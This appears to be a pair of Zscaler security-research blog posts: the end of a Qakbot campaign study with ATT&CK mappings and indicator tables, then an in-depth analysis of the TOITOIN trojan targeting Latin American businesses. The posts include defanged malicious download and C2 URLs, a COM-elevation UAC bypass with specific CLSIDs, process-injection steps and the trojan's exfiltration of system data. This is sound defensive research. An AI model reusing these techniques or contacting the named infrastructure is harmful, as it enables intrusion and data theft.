This analysis highlights the global reach and widespread distribution of Qakbot's C2 servers, indicating the significant geographic presence of the malware's command centers. Understanding the distribution of C2 servers in different countries is crucial for devising targeted defense strategies and collaborating with international cybersecurity partners to combat the threat effectively.
Table 1 - Displays the top 5 countries where Qakbot Command and Control (C2) servers are most active.
Figure 23 - Showcases the distribution of Qakbot Command and Control (C2) servers.
Upon further analysis of the Command and Control (C2) servers, we observed that the transaction count of Qakbot C2s was significantly higher during March and April, than at the beginning of the year. This indicates a surge in the malware's activities during that period, and it may suggest that the threat actor(s) behind Qakbot were particularly active in executing campaigns during this timeframe.
Table 2 - Displays the Qakbot transaction count month over month from January to May of 2023.
Figure 24 - Illustrates spikes in the transaction count of Qakbot Command and Control (C2) activity by date.
In March 2023, Germany experienced a significant surge in Qakbot Command and Control (C2) activity. During this period, major Qakbot C2s from the United States (US), Netherlands (NL), and France (FR) were directed towards Germany, indicating a targeted campaign against the country. A similar trend was observed in April 2023, although with a reduced volume of data transferred compared to March. The data suggests a concentrated effort by threat actors to target Germany during these months, potentially signaling specific motivations or objectives in that region.
Figure 25 - Illustrates the Qakbot Command and Control (C2) activity specifically targeting Germany in March 2023.
In April 2023, our observations revealed noteworthy Command and Control (C2) activity originating from Argentina (AR) and targeting the United States (US) with substantial data transfer. Additionally, Qakbot C2s in Italy (IT) were observed targeting Brazil (BR). These activities indicate an interconnected network of C2 servers and highlight the global nature of Qakbot's operations, with specific regions targeting each other for potential malicious activities.
Figure 26 - Depicts the Qakbot Command and Control (C2) activity during April 2023.
Conclusion
In conclusion, Qakbot is a highly sophisticated banking trojan malware, strategically targeting businesses across different countries. This elusive threat employs multiple file formats and obfuscation methods within its attack chain, enabling it to evade detection from conventional antivirus engines. Operating through a phishing campaign, Qakbot continuously adapts to new distribution mechanisms to more effectively infect users.
Through its experimentation with diverse attack chains, it becomes evident that the Threat Actor behind Qakbot is continuously refining its strategies. However, after June, a significant drop in Qakbot campaigns is observed, suggesting a possible pause in their activities. Zscaler's Threat Labs team extensively analyzed the behavior of various files associated with Qakbot, utilizing the MITRE ATT&CK framework to assess threat scores and triggered techniques. The team remains vigilant, continuously monitoring the campaign, and is prepared to unveil any new findings they may discover.
To combat such threats effectively, organizations must remain vigilant and adopt best practices, including implementing multi-layered security defenses and conducting security awareness training. By staying proactive and collaborative, the cybersecurity community can thwart Qakbot's relentless pursuit of infiltrating and compromising systems, ensuring a safer digital landscape for individuals and enterprises worldwide.
Zscaler Sandbox Coverage
During the investigation of this campaign, Zscaler Sandbox played a crucial role in analyzing the behavior of various files. Through this sandbox analysis, the threat scores and specific MITRE ATT&CK techniques triggered were identified, as illustrated in the screenshots provided below. This comprehensive approach empowers cybersecurity professionals with critical insights into the malware's behavior, enabling them to effectively detect and counter the threats posed by this campaign.
Figure 27 - Zscaler Sandbox report detecting and analyzing recent Qakbot malware campaign.
Zscaler’s multilayered cloud security platform detects payloads with following threat names:
Win32.Banker.Qakbot
MITRE ATT&CK Techniques
Tactic
Technique ID
Technique Name
Initial Access
T1566
Phishing
Execution
T1204
T1059
T1047
User Execution
Command and Scripting Interpreter
Windows Management Instrumentation
Persistence
T1053.005
T1547.001
Scheduled Task
Registry Run Keys / Startup Folder
Privilege Escalation
T1053.005
Scheduled Task
Defense Evasion
T1027
T1070.004
T1112
T1202
T1574.002
T1574.001
T1564.001
T1055
T1218
Obfuscated Files or Information
File Deletion
Modify Registry
Indirect Command Execution
DLL Side-Loading
DLL Search Order Hijacking
Hidden Files and Directories
Process Injection
System Binary Proxy Execution
Credential Access
T1003
T1555.003
OS Credential Dumping
Credentials from Web Browsers
Discovery
T1016
System Network Configuration Discovery
Command and Control
T1071
T1095
Application Layer Protocol
Non-Application Layer Protocol
Indicators Of Compromise (IOCs)
Case Study 1 - March 2023
Description
MD5
Network
Malicious PDF Download JS File
c986136d713f71449ad8ba970379d306
85.239.52[.]29/ONT[.]php
Obfuscated JS file download Qakbot
3607ad95e33dd12803af676597df5c6a
45.66.248[.]9/qBSTwc/aw
Qakbot Payload
770453c5d3ed689a451d55e947764742
-
Description
MD5
Network
Malicious HTML file download Zip file
755a25e36cbf87b7e4415de2fdf0f9e3
https[:]//jbdata.com.ng/uq/uq[.]php?88748
https[:]//superspeedtransports.com/qs/qs.php?59697
https[:]//aadilmehmood.com/oab/oab[.]php?24149
Downloaded Zip File
1a90b0c2129b8a552b6ec751ef1e6caa
-
Extracted JS File
e2a21a2a7f5d2d85c0bcda95d6d0fc03
https[:]//azarmadar[.]com/aUqL/120
Qakbot Payload
74ee45a7dc4ca40eaaf817dc5959328d
-
Description
MD5
Network
Malicious PDF
dd27c04bc998f69467c2c81c53a111ab
http[:]//gurtek.com[.]tr/exi/exi.php
Downloaded Zip File
789e3789de0eb630000adb1a2ed27d7e
-
Extracted WSF File
e94c5f36ec0cccccb231e1cd04f2a646
https[:]//graficalevi.com[.]br/0p6P/vLSyX
Qakbot Payload
19c1526182fe5ed0f1abfafc98d84df9
-
Description
MD5
Network
Malicious PDF
cccda4837024a71fa74ceb420b5e854e
https[:]//iquodigital[.]com/eps/delectusfuga.php
Download Zip
2bc1cbc8c8f54245ca0fefb49c229f77
-
Extracted HTA File
2394742a2c6fa05327cf1d48767af727
https[:]//zainco[.]net/OdOU/5k4ll56eOFo
Qakbot Payload
fb5ca6825e52d72a2010c8474ddaaa41
-
Description
MD5
Network
Zip File
91fb1dcf5a6222262fd7fa77019bb1e4
-
XLL File
68781578b0b58e21177c7b71f9b85567
-
Qakbot
ff58f9cf0740aead678d9e36c0782894
-
Case Study 2 - April 2023
Description
MD5
Network
PDF File
2342ee9c7520abef3700b0fddf825c71
http[:]//eaglewingsuae[.]com/wicd/643d2215dacb3.zip
Zip File
03c8cd94f624ae6074c8facb973d4b9d
-
WSF File
65f256e4ce4013742f2b59d869b6c663
http[:]//77.91.100[.]135/aSxBaqnfj98.dat
Qakbot
4deae2c9f1f455670f2e091ce7e0b4e1
-
Description
MD5
Network
OneNote File
77079f381ac044ad7a3df18607657f74
-
MSI File
8056b3bafd82ce7e6156f1b3f314db52
-
Cleanup PS1 File
e1031ce77dde7a368159a9dd0ed7e6d4
-
WSF File
cb93c679ed14fe409df9a6cb564e488f
https[:]//logswalker[.]com/aF8HY9p/2
Qakbot
ce0d0ef75f3d7da7ba434a2017905132
-
Case Study 3 - May 2023
Description
MD5
Network
PDF File
f42544fe0db583e4b836e4b8cfc52802
https[:]//inspiratour[.]co[.]id/tsopexfzrf/tsopexfzrf.zip
ZIP File
842fb152664671ca137b8ae390900fa6
-
WSF File
934feee5657b08faec80a29cd2a77acc
http[:]//45.155.37[.]101/a2nZbs476.dat
http[:]//149.102.225[.]18/a2nZbs476.dat
http[:]//207.148.14[.]105/a2nZbs476.dat
http[:]//5.42.221[.]144/a2nZbs476.dat
Qakbot
2b652290e80db5de823a915145eff417
-
Description
MD5
Network
ZIP File
55027a65b1889b0642dbce8f39f4ba74
-
Side Loading DLL
48f68450df1ca26e3fb1d7c07d0fd836
http[:]//109.172.45[.]9/Leq/15
Qakbot
fce88b20bceebd0bfed68131820efab6
-
Tue, 25 Jul 2023 08:31:53 -0700Meghraj Nandanwarhttps://www.zscaler.com/blogs/security-research/hibernating-qakbot-comprehensive-study-and-depth-campaign-analysisThe TOITOIN Trojan: Analyzing a New Multi-Stage Attack Targeting LATAM Region
https://www.zscaler.com/blogs/security-research/toitoin-trojan-analyzing-new-multi-stage-attack-targeting-latam-region
Summary
Discover the intricate layers of a new sophisticated and persistent malware campaign targeting businesses in the LATAM region delivering the TOITOIN Trojan. Delve into the multi-stage attack methodology, from deceptive phishing emails to custom-built modules, as we dissect its techniques and shed light on its impact. Gain valuable insights into the evolving threat landscape and learn how organizations can fortify their defenses against this emerging Latin American cyber threat. Stay one step ahead with this in-depth analysis of TOITOIN and safeguard your business against advanced malware attacks.
Introduction
In the ever-evolving landscape of cyber threats, researchers from Zscaler ThreatLabz have recently uncovered a concerning development: a new targeted attack campaign striking businesses in the Latin American (LATAM) region. This sophisticated campaign employs a trojan that follows a multi-staged infection chain, utilizing specially crafted modules throughout each stage. These modules are custom designed to carry out malicious activities, such as injecting harmful code into remote processes, circumventing User Account Control via COM Elevation Moniker, and evading detection by Sandboxes through clever techniques like system reboots and parent process checks. The ultimate payload of this campaign is a new Latin American Trojan called TOITOIN, which incorporates a unique XOR decryption technique to decode its configuration file. Once decrypted, the trojan gathers crucial system information, as well as data pertaining to installed browsers and the Topaz OFD Protection Module, before sending it to the command and control server of the attackers in an encoded format. This blog post provides an in-depth analysis of this emerging malware campaign and its corresponding infection chain. Read on to learn more about this alarming threat.
Key Takeaways
The TOITOIN malware campaign targets businesses in the LATAM region, utilizing sophisticated techniques and multi-stage infection chains.
By leveraging Amazon EC2 instances, the threat actors evade domain-based detections, making it more challenging to detect and block their activities.
The analyzed campaign employs a series of custom-developed modules, including:
Downloader Module: Downloads further stages, evades sandboxes through system reboots, and maintains persistence using LNK files.
Krita Loader DLL: Sideloaded via a signed binary, it loads the InjectorDLL module.
InjectorDLL Module: Injects the ElevateInjectorDLL into the remote process (explorer.exe).
ElevateInjectorDLL Module: Evades sandboxes, performs process hollowing, and injects either the TOITOIN Trojan or BypassUAC module based on process privileges.
BypassUAC Module: Utilizes COM Elevation Moniker to bypass User Account Control and execute the Krita Loader with administrative privileges.
The final payload, the TOITOIN Trojan, employs custom XOR decryption routines to decode the configuration file containing the Command & Control server's URL. It transmits encoded system information and details about installed browsers and the Topaz OFD Protection Module to the C&C server. In the absence of the configuration file, the information is sent via a POST request using curl.
Zscaler's Zero Trust Exchange provides strong protection against sophisticated malware campaigns like TOITOIN, leveraging its zero trust model, advanced threat intelligence, cloud-native architecture, and granular access controls to ensure the security and integrity of customer environments.
TOITOIN Infection Chain
In May 2023, diligent threat hunters within the Zscaler cloud, recognized as the world's largest security cloud, made a significant breakthrough. Their discovery involved the identification of numerous malware samples concealed within compressed ZIP archives. All of the identified archives were found to be hosted by Amazon EC2, as shown in Figure 1 below.
Upon closer examination and thorough analysis of related malware samples obtained from Zscaler cloud, it became evident that a novel campaign had emerged. This campaign, named TOITOIN introduced a series of custom-built malwares specifically designed to target businesses operating within LATAM. Commencing in May 2023, this malicious endeavor continues to pose an ongoing threat, demanding immediate attention and comprehensive understanding from defenders.
Figure 1 - Researchers discover suspicious ZIP archives hosted on Amazon EC2 during threat hunting activities in Zscaler cloud.
The TOITOIN malware infection chain, shown in Figure 2 below, employed in this targeted campaign follows a well-crafted sequence, starting with an initial compromise phishing email.
Figure 2 - The multi-staged infection chain.
In the context of this campaign, Figure 3 offers a glimpse into the deceptive email crafted with the specific intent to entrap a prominent Investment Banking company in Latin America. Carefully designed, the email capitalizes on a Payment Notification Lure, alluring the recipient to engage further by clicking on a button labeled 'Visualizar Boleto,' which translates to 'View Invoice' in English. This strategic choice of wording aims to evoke a sense of urgency and entice the target to explore the contents of the email, ultimately falling into the trap set by the threat actors.
Figure 3 - Screenshot of phishing email sent by threat actors behind this TOITOIN campaign.
Upon clicking the button in the phishing email, the user unwittingly initiates a chain of events. The URL http[:]//alemaoautopecas[.]com/1742241b/40c0/df052b5e975c.php?hash=aHR0cHM6Ly9teS5ub2lwLmNvbS9keW5hbWljLWRucw is then opened, serving as an intermediary redirect. Subsequently, the victim's browser is redirected once again, this time to the address http[:]//contatosclientes[.]services/upthon. It is at this point that the malicious ZIP archive is stealthily downloaded onto the victim's system, and begins infiltrating their defenses.
Notably, several other domains have been identified as vehicles for delivering these malicious ZIP archives. These domains include:
atendimento-arquivos[.]com
arquivosclientes[.]online
fantasiacinematica[.]online
By diversifying the delivery channels, the threat actors behind this campaign have effectively evaded detection based on domain reputation. However, it is worth mentioning that the malicious ZIP archives were hosted on an Amazon EC2 instance as shown below in Figure 4. Leveraging the capabilities of Amazon's cloud infrastructure, the attackers have managed to stay one step ahead, shielding their activities from domain-based detection mechanisms.
Figure 4 - Malicious ZIP archive downloaded from the Amazon EC2 instance.
To further obfuscate their intentions, the threat actors adopted a dynamic approach to naming the ZIP archives. With each download, the server generates a new and randomly generated file name, thwarting simplistic attempts at detection based on static file naming patterns. This tactic adds an additional layer of complexity to the campaign, making it more challenging to identify and mitigate the threat effectively.
Within the ZIP archive labeled as "HGATH33693LQEMJ.zip," a malicious executable file titled "HCEMH.hqdrm.63130.exe" resides. This specific file operates as the designated downloader module, orchestrated by the threat actors to initiate the retrieval of numerous payloads from the server under their control. Alongside this primary function, the downloader module, analyzed in the next section, also encompasses a range of evasion techniques, strategically implemented to circumvent detection and hinder security measures.
Analysis Of The Multi-Staged TOITOIN Infection Chain
Stage-1: Downloader module
Examination of the TOITOIN downloader module reveals its intricate operations, including string decryption routines, path retrieval, log file creation, and the selection of random file names. Understanding the string decryption process employed by malware is vital for defenders as it enables them to detect encrypted or obfuscated strings, analyze the attack, attribute it to specific threat actors, respond effectively, and develop mitigation strategies. The findings in this section shed light on the downloader module's functionalities and provide valuable insights into the overall execution flow of the TOITOIN malware.
During the analysis of the malware, specific attention was given to the downloader module. The path to the module's Program Database (PDB) file was identified as "F:\Trabalho_2023\OFF_2023\LOAD_APP_CONSOLE_C_PLUS\LOAD\x64\Release\NAME.pdb."
Upon execution, the downloader module initiates a String Decryption routine. Initially, the encrypted hex strings are concatenated in reverse order, employing multiple heap allocations. The resulting concatenated encrypted hex string is then passed as an argument to the decryption routine, as depicted in Figure 5 below.
Figure 5 - Illustrates the String decryption routine, showcasing the concatenation process.
In the decryption routine, the encrypted hex string undergoes a series of operations. Firstly, the string is reversed, and subsequently, an XOR operation is performed between the N and N+1 byte, where N is incremented by 2 for each operation. To facilitate this process, a string decryptor was developed (Code: Appendix A) specifically for the string decryption routine. Utilizing this string decryptor, the final concatenated encrypted hex string can be decrypted, revealing a decrypted string in the pattern of "@1-55: <hex_string>." Each of these encrypted hex strings is then individually decrypted using the same string decryption function, based on the specific index value passed to the function according to the requirements. Figure 6 shows the decryption of the encrypted hex strings using the string decryptor.
Figure 6 - Overview of the string decryption routine, focusing on the decryption of the downloader URL.
Once decrypted, the downloader module retrieves the paths to the 'Appdata', 'HomeDrive', and 'Username' of the infected system by calling the getenv() function, with the decrypted strings "appdata, homedrive, username" as arguments. The module then proceeds to create a log file named "<reverse_of_computer_name>.log" within the "AppData/Roaming" directory. The computer name is obtained by invoking the GetComputerNameA() function.
Additionally, the downloader module selects a random file name from a collection of encrypted hex strings, shown below in Figure 7. These file names are decrypted dynamically using the same string decryption routine. The chosen file name is assigned to a signed executable responsible for sideloading the Krita Loader DLL. Further analysis of this process is presented in the subsequent sections.
Figure 7 - Showcases a list of randomly generated file names.
Once a file name is selected, the downloader module proceeds to create a batch script in the temp directory with a dynamically generated name. The necessary information for the batch script, including the path to the temp directory, extensions, and content, is decrypted using the string decryption routine.
Upon execution, the batch script writes and executes a VBScript within the temp directory. The VBScript, in turn, creates a shortcut (.LNK) file in the startup folder. The name of the shortcut file, "icepdfeditor.lnk," is dynamically set to the previously selected random file name from the list. The TargetPath of the shortcut file is assigned as "C:\Users\Public\Documents\knight\icepdfeditor.exe," with the file name again set to the random selection from the list. The VBScript, identified as "rnTiucm.vbs," is subsequently deleted towards the end of this process.
Figure 8 - Batch script creating LNK file in the StartUp folder for persistence.
The above figure illustrates the batch script's creation of an LNK file in the StartUp folder, ensuring persistence on the compromised machine. By placing the "icepdfeditor.lnk" shortcut in the StartUp folder, it executes every time the system restarts, subsequently launching "icepdfeditor.exe" in the Public Documents folder.
Following this, the downloader module initiates the downloading routine, decrypting URLs dynamically using the string decryption process, as shown in Figure 9 below.
Figure 9 - String decryption routine (downloader URLs).
Then in Figure 10 demonstrates the use of InternetOpenUrlA() and InternetReadFile() functions to retrieve encrypted data containing multiple payloads for this complex attack, disguised here as mp3 files from the URL: http[:]//cartolabrasil[.]com/Homicidio[.]mp3/1-6.mp3.
Figure 10 - Downloading multiple payloads from http[:]cartolabrasil.com.
The encrypted data is decrypted and reversed, and the resulting payloads are written to a newly created folder within the Public Documents directory, as depicted in Figure 11.
Figure 11 - Multiple payloads downloaded in the public documents folder.
In Figure 11, it can also be observed that the encrypted payloads have dynamically generated filenames based on the computer name, username, etc.. The Loader DLL, "ffmpeg.dll," has its filename decrypted using the string decryption process. The signed binary, "icepdfeditor," is randomly selected from the list of file names dynamically, and the extensions are decrypted accordingly. Additionally, the downloader creates a configuration file with the ini extension named after the computer name in the Public Documents folder, containing details about the encrypted payloads.
Towards the end of this process, the downloader generates a batch script in the "AppData\Roaming" directory, named after the computer name. Upon execution, this script restarts the system after a 10-second timeout, as depicted in Figure 12 below. The content of the batch script is decrypted using the string decryption function.
Figure 12 - Evades sandbox & executes the LNK file in the startup folder by restarting the system.
The system reboot serves to evade sandbox detection since the malicious actions occur only after the reboot. Upon restarting, the shortcut (.LNK) file, "icepdfeditor.lnk," in the startup folder is automatically executed, triggering the execution of "icepdfeditor.exe" from the Public Documents folder. "icepdfeditor.exe" is a valid signed executable by "ZOHO Corporation Private Limited," downloaded alongside the other payloads. Figure 13 shows the execution of "icepdfeditor.exe."
Figure 13 - Signed binary by ZOHO Corporation downloaded alongside malicious payloads.
Upon final execution, the signed binary, "icepdfeditor.exe," sideloads the malicious Krita Loader DLL, "ffmpeg.dll," from the current directory "C:\Users\Public\Documents\<username>\" taking advantage of the Windows Search and Load order to load the malicious Loader DLL instead of the legitimate DLL, as illustrated in Figure 14.
Figure 14 - Signed Binary “icepdfeditor.exe” sideloads the malicious Krita Loader DLL “ffmpeg.dll”.
Stage-2: Krita Loader DLL (ffmpeg.dll)
PDB Path: F:\Trabalho_2023\OFF_2023\DLL_Start_OK\x64\Release\DLL_Start_OK.pdb
In the analysis of the Krita Loader DLL (ffmpeg.dll), it is observed that the DLL reads encoded data from the <reverse_computer_name>.jpg file. This encoded data is then dynamically reversed and decoded using a replacement routine. The replacement routine replaces special characters with specific characters based on an algorithm, for example, replacing "!" with "A".
Figure 15 - Showcases the decoding process of the DLL, involving reverse and replace functions.
As depicted in the preceding screenshot, the data is subsequently subjected to base64 decoding, resulting in the formation of a PE file. This PE file is then written to the temporary directory, utilizing a randomly generated file name, as illustrated in Figure 16.
Figure 16 - Demonstrates the process of decoding the DLL through Base64 decoding.
Subsequently, the decoded InjectorDLL is loaded into memory by the Krita Loader DLL using the LoadLibraryA() function. Control is then transferred by retrieving the address of the export function "TEMP" through the GetProcAddress() function.
Figure 17 - Illustrates the loading of the InjectorDLL via the LoadLibraryA() function.
Stage-3: InjectorDLL Module
PDB Path: F:\Trabalho_2023\OFF_2023\DLL_Start_IN\x64\Release\DLL_START_IN.pdb
Once the InjectorDLL is loaded, it proceeds to read encoded data from another <computer_name>.jpg file. Similar to the Krita Loader DLL, the InjectorDLL dynamically reverses and decodes the data using a replacement routine that replaces special characters with specific characters based on a predefined algorithm. Subsequently, the data undergoes base64 decoding, resulting in the formation of the ElevateInjectorDLL module. This module is then injected into the remote process "explorer.exe" using a sequence of functions: OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. The screenshot shown in Figure 18 below illustrates this injection process.
Figure 18 - Demonstrates the injection of the ElevateInjectorDLL module into the remote process "explorer.exe."
Stage-4: ElevateInjectorDLL Module
PDB Path: F:\Trabalho_2023\OFF_2023\DLL_Start_UP\x64\Release\DLL_Start_UP.pdb
Once injected into the explorer.exe process, the ElevateInjectorDLL module performs initial checks. It verifies whether the parent process is either "explorer.exe" or "winlogon.exe" and checks if the mutex "explorer" or "winlogon" has already been created using the OpenMutexA() function. If the conditions are met, the module creates the mutex "explorer" or "winlogon" based on the parent process as shown in Figure 19 below. Subsequently, it executes the main routine to carry out further actions.
Figure 19 - Showcases the process of checking the parent process, specifically verifying if it is either "explorer" or "winlogon".
This technique ensures that the module evades sandboxes by verifying the parent process. If the parent process does not match the expected value, the malicious code remains dormant and is not executed.
In this particular scenario, as the parent process is "explorer.exe," the main routine is executed. Within this routine, specific strings are base64 decoded. These strings contain the server address (191[.]252[.]203[.]222/Up/indexW.php) and the paths of the target processes (explorer.exe and svchost.exe) where the subsequent injection stages will take place.
Additionally, the ElevateInjectorDLL checks whether the process is elevated. In this case, as the process is not elevated, the DLL reads and decrypts another JPG file from the Public Documents folder. This decryption process forms the next stage module called "BypassUAC." Subsequently, the module performs process hollowing to inject the BypassUAC module into another explorer.exe process that was previously spawned in a suspended state.
Figure 20 - Demonstrates the injection of the BypassUAC module into the explorer.exe process when the process is not elevated.
Stage-5: BypassUAC Module
PDB Path: F:\\Trabalho_2023\\OFF_2023\\EXE_BypassUAC\\x64\\Release\\BypassUAC.pdb
The BypassUAC Module is responsible for performing User Account Control (UAC) bypass, enabling the execution of the Downloader module with administrator privileges.
When the previously injected BypassUAC Module is executed within the remote process explorer.exe, it exits without executing the main routine under two conditions. Firstly, if the mutex "explorer" is not created, and secondly, if the mutex "bypass" is already created. However, if these conditions are not met, the module proceeds to create the "bypass" mutex before continuing its execution.
Figure 21 - Depicts the process of opening and creating mutexes.
In the context of UAC bypass, the malware leverages the COM Elevation Moniker "Elevation:Administrator!new:" along with specific elevated COM Objects. The purpose is to bypass the User Account Control (UAC) restrictions and gain elevated privileges on the system. To achieve this, the malware utilizes the CLSID {3AD05575-8857-4850-9277-11B85BDB8E09}, which provides functionalities related to copy, move, rename, delete, and link operations. Additionally, the CLSID {BDB57FF2-79B9-4205-9447-F5FE85F37312} is employed, specifically designed for the installation of Internet Explorer add-ons. By exploiting these elevated COM Objects, the malware aims to elevate its privileges and carry out malicious activities without being hindered by UAC restrictions.
Figure 22 - Illustrates the UAC bypass technique achieved through the use of the COM Elevation Moniker.
In the process of UAC bypass, the malware utilizes the Copy/Move/Rename/Delete/Link COM Object. This COM Object serves the purpose of copying the "cmd.exe" file from the System32 Folder to the Temp directory with administrator privileges. The copied file is then renamed as [1]bdeunlock.exe. This technique allows the malware to manipulate system files and execute commands with elevated privileges, facilitating further malicious activities.
Figure 23 - Depicts the operation of copying the "cmd.exe" file into the Temp directory with administrator privileges using a COM Object.
Moreover, the auto-elevating Internet Explorer Add-on Installer, known as "IEInstal.exe," is triggered through the COM Object. This action aims to execute the signed binary "icepdfeditor.exe" with elevated privileges by spawning a new process named [1]bdeunlock.exe. The process is launched with specific arguments, namely "/C start <path_to_signed_binary>," as indicated in Figure 24. This technique allows the malware to execute the signed binary with elevated permissions, enabling it to carry out malicious activities on the system.
Figure 24 - Demonstrates the UAC bypass executed by the Internet Explorer Add-On Installer. This bypass enables the execution of the Krita Loader DLL with elevated privileges.
Consequently, the signed binary is executed with elevated privileges, facilitating the sideloading of the Krita Loader DLL onto the machine with administrative privileges.
Once the Krita Loader DLL is sideloaded with elevated privileges, it follows the same routine as previously discussed. However, in this instance, the ElevateInjectorDLL module, which previously injected the BypassUAC module, verifies whether it has elevated privileges. If elevated privileges are present, the module decrypts the final TOITOIN Trojan and injects it into the remote process "svchost.exe," as depicted in the screenshot provided in Figure 25 below.
Figure 25 - Displays the injection of the TOITOIN Trojan into the svchost.exe process.
Stage-6: TOITOIN Trojan
The ElevateInjectorDLL injects the new Latin American Trojan, TOITOIN, into the remote process "svchost.exe." Upon execution, the Trojan first reads the encoded <computer_name>.ini configuration file that was previously written in the Public Documents folder by the Downloader module, as the captured screenshot in Figure 26 below shows.
Figure 26 - Demonstrates the process of reading the INI configuration file.
Below, Figure 27 reveals the decoding process of the hex blob within the INI Configuration file. The hex blob is reversed and converted to ASCII format, unveiling its original content.
Figure 27 - Showcases the decoding process of the INI Configuration File.
Each of the #<1-6> hex strings undergoes further decoding using the same logic. In the Figure 28 screenshot below, the decoded #1 hex string reveals the complete path and file name of the multiple payloads that were downloaded by the Downloader from http[:]//cartolabrasil[.]com.
Figure 28 - Depicts the continued decoding process of the INI Configuration File.
Additionally, the #3 hex blob undergoes decoding using the aforementioned logic, resulting in another hex blob. This hex blob is then decrypted using a custom XOR logic, such as applying the XOR operation with the first two bytes (0D44 -> (0x44 ^ 0x31) - 0x0D = "h"). ThreatLabz researchers developed a decryptor specifically for the INI Configuration file, as shown below in Figure 29.
Figure 29 - Showcases the INI Configuration Decryptor, which reveals the Command & Control (C&C) URL.
In Figure 29, the decrypted value extracted from the INI Configuration file reveals the Command & Control (C&C) URL: http[:]//afroblack[.]shop/CasaMoveis. However, during the analysis of a different corrected sample, a distinct C&C server was discovered: http[:]//contabilidademaio[.]servebeer[.]com/Robs/counter.
The final backdoor decrypts various strings, including C&C URLs and other crucial information, using a custom XOR decryption logic based on the INI configuration values of "1" or "2":
5EBCDD2160A3E060F95B, 4644454647484786DF61 - /0202.php
B9D91B5B9FC2C1035AFB, 07076684E60A094881C0 - /POST.php
4980C50B4AB5D534A72BBD144483D7084A9D21B3164E8B88DA7BD9, D40CB117B6C1C1C115B629A13291C516B82AAD3E80D87493C70642 - http[:]//bragancasbrasil[.]com
37AE12B71962A0FE01097390F01861BEC0C9C6CC - http://179[.]188[.]38[.]7
1D7E85858489898A8B8C8E87EA0B6588E6017E96, 95F61C7A9BFE1F60A1E2277EE3027AFF7EF674AC - 26/04/2023(TOITOIN)
Some of the decrypted strings include paths to payloads, browser installations, and relevant dates.
Additionally, a substantial encrypted hex blob is decrypted using the same custom XOR decryption logic. This hex blob consists of strings related to file paths, browser types, and timestamps. The TOITOIN Trojan employs these decrypted strings in its operation:
@36:C91756F9588E30A03F6E85DF7DD376E3094988D862B33249BC284E9E20A2359DC81DBD0157B42B92C6 - \Program Files\Topaz OFD\Warsaw\core.exe
@37:86D025A529BF2C - [Core]
@38:5F8BF014BD2A - [64x]
@39:204A4C4FF665 - [32x]
@45:679F3E9C3590C41062FB5FFF5CF07C - Google\Chrome\
@46:314F8F3B9533AE217087C1055BF051F864FB54F76CE362EB2BA12BA1 - Mozilla Firefox\firefox.exe
@47:748CCB71E76BE87FC2D3289133AE2F90C406538DC30D4C89C90D4340943C90 - Internet Explorer\iexplore.exe
@48:1051F2538BCC1FBD006D8DCC034494C11FB116B528A13699F66DD40B - Programs\Opera\launcher.exe
@49:5C9D21A1389BCD0A4C99D97BD175E775D577ED518380D47CD0 - Programs\Opera\opera.exe
@50:47A53E9032903595CA0E5B91C41DB32153F2528FC91C4CF16AE866F350F269FC558B88DC64F8 - Microsoft\Edge\Application\msedge.exe
@51:AB364E82CB0D4886C91EA1CF - [Iexplorer]
@52:1541B52F9031AF24B0 - [Chrome]
@53:2EB8379723AC27A235A3 - [Mozzila]
@54:5F8BEB6DE367F966 - [Opera]
@55:5882F66AE077E5 - [Edge]
The Trojan fetches the Windows version by querying the ProductName registry key value, retrieves the environment variable %homedrive% and the path to the Program Files directory, and determines whether the system is 32-bit or 64-bit.
Based on the installed browsers, including Chrome, Edge, Opera, Mozilla Firefox, and Internet Explorer, the Trojan assigns specific values to each browser. It also checks for the presence of the Topaz OFD - Protection Module at the specified path and sets the value "[Core]" accordingly.
Furthermore, another encrypted hex blob is decrypted, containing strings related to certain variables, such as ClienteD.php?1=, - (hyphen), Versao_DLL(, Data(, dd/mm/yyyy, and hh:mm:ss:
@36:F5639735AF24A329BF3552F36DEC1D7F8D - \ClienteD.php?1=
@37:77A6E232 - -
@38:D7C6C2D31BB115B92AA8394CA9C4DD - Versao_DLL(
@39:2170ACFD73E56BFD17 - Data(
@40:F266FB1AB61575DF68D07B - dd/mm/yyyy
@41:EB65FC06429EE96CEE - hh:mm:ss
Leveraging these decrypted strings, the Trojan assigns values to variables like AA1, AA2, AA3 & AA4, AA5, and AA10, using the previously decrypted encoded format. For example, AA1 represents the computer name, AA2 represents the Windows version, AA3 & AA4 represent the installed browsers, AA5 represents the bit value (32x or 64x), and AA10 represents the date (26/04/2023, in this case).
AA1 - 0393948384C453D205F445B4355444 --> DESKTOP-******* (Computer Name)
AA2 - E6F696471636574654020313023777F646E69675 --> Windows 10 Education (Windows Version)
AA3 & AA4 - D556764654B5D5275627F6C607875694B5 --> [Iexplorer][Edge] (Installed browsers & protection module)
AA5 - D5874363B5 --> [64x] (Bit)
AA10 - 92E494F44594F4458233230323F24303F26323 --> 26/04/2023(TOITOIN)
Analyzing and understanding these decrypted strings allows for a better understanding of the TOITOIN Trojan's configuration, the system it operates on, and the communication channels it utilizes for command and control.
TOITOIN utilizes the decrypted strings in the following manner in order to gather the system & browser information:
1. It fetches the Windows version by querying the ProductName value from the registry key: SOFTWARE\Microsoft\Windows NT\CurrentVersion.
2. It retrieves the environment variable %homedrive% using GetEnvironmentVariableW, which usually corresponds to the C:\ drive.
3. It determines whether the system is 32-bit or 64-bit and sets the value to [64x] or [32x] accordingly.
4. It checks if specific web browsers are installed on the system by verifying the existence of corresponding folders and files. The checked browsers include Chrome, Edge, Opera, Mozilla Firefox, and Internet Explorer.
5. Based on the installed browsers, it assigns specific values for each browser:
[Iexplorer] for Internet Explorer
[Chrome] for Chrome
[Mozzila] for Mozilla Firefox
[Opera] for Opera
[Edge] for Microsoft Edge
6. It checks whether the Topaz OFD - Protection Module is installed at the path \Program Files\Topaz OFD\Warsaw\core.exe. If the module exists, it sets the value "[Core]".
By leveraging these decrypted strings and performing these checks, the TOITOIN Trojan adapts its behavior based on the system's Windows version, installed browsers, and the presence of the Topaz OFD - Protection Module.
Command & Control Communication
The TOITOIN Trojan communicates with the Command & Control (C&C) server located at http[:]//afroblack[.]shop/CasaMoveis\ClienteD.php, shown in Figure 30 below, to transmit encoded system information, browser details, and Topaz OFD Protection Module information.
Figure 30 - Displays the information transmitted to the Command & Control (C&C) server located at http[:]afroblack.shop/CasaMoveis\ClienteD.php.
The exfiltrated information, once decoded, includes the following data:
Computer Name: DESKTOP-******
Windows Version: Windows 10 Education
Installed Browsers & Topaz OFD Protection Module: [Iexplorer][Edge]
OS Bit Version: [64x]
